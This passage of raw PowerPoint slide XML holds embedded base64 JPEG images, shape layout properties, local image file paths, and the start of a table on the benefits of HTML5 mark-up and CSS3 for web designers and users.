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"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="155575" y="-1828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AutoShape 4" descr="data:image/jpeg;base64,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"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="307975" y="-16764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AutoShape 6" descr="data:image/jpeg;base64,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"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="460375" y="-1524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2" name="Picture 2" descr="C:\Users\root\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5HD8YZZ1\Old_Drill_PNG_by_AbsurdWordPreferred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49961">
            <a:off x="3508371" y="2264058"/>
            <a:ext cx="1647735" cy="69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root\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3KVK926E\Drill2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463" y="2038350"/>
            <a:ext cx="1280537" cy="128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028919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– Benefits to the WEB Designer and user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459334"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="971550"/>
          <a:ext cx="8077200" cy="3361238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307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9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325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Feature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287">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200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37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effectLst/>
                        </a:rPr>
                        <a:t>New HTML mark-up and language improvements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287">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>CSS3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37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effectLst/>
                        </a:rPr>
